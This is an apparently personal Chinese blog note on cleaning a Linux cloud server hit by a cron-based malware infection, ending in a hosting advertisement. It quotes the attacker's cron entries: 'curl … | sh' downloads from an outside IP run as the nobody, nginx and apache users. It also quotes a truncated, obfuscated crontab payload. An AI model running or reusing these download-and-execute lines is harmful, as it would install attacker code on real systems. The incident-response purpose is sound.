现象:
安装成功了
但是没多久又进来了
而且至今登录到系统来了
[root@izd7oc0a0u64q75bim8bu8z ~]# tail /var/log/cron
\Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z crond[3209]: (cd) ERROR (getpwnam() failed)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z crond[3209]: (cd) ERROR (getpwnam() failed)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z crond[3209]: (cur) ERROR (getpwnam() failed)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5724]: (root) CMD (echo 111 >> /home/test.txt)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5723]: (nobody) CMD (cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5726]: (nginx) CMD (cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5725]: (apache) CMD (cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh)
Oct 23 00:24:02 izd7oc0a0u64q75bim8bu8z CROND[5720]: (nginx) MAIL (mailed 32 bytes of output but got status 0x004b#012)
Oct 23 00:24:02 izd7oc0a0u64q75bim8bu8z CROND[5718]: (nobody) MAIL (mailed 32 byte
[root@izd7oc0a0u64q75bim8bu8z tmp]# cat /etc/crontab
/13 root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to
每分钟 nobody nginx apache用户 执行一次 下载脚本运行
干掉这个脚本,然后停止了crond服务 在var/log/cronrizhikli日志里面就没有异常下载脚本
还有这个异常
发现这里也有用户
打开crontab就一直在下载一分钟执行一次
guoran果断删了 apache 和nobody 只剩下nginx一个在下载 但是 crontab -l也没发现啥异常
做最后终于找到恶意用户位置
直接全部删掉只留下root 最后恢复正常了
以后要重点关注登录系统用户情况
more /var/log/secure |grep Accepted
查询登录频繁用户
awk '/Failed password/ {print $(NF-3)}' /var/log/secure |sort -n |uniq -c|sort -n |tail
另外有需要云服务器可以了解下创新互联cdcxhl.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。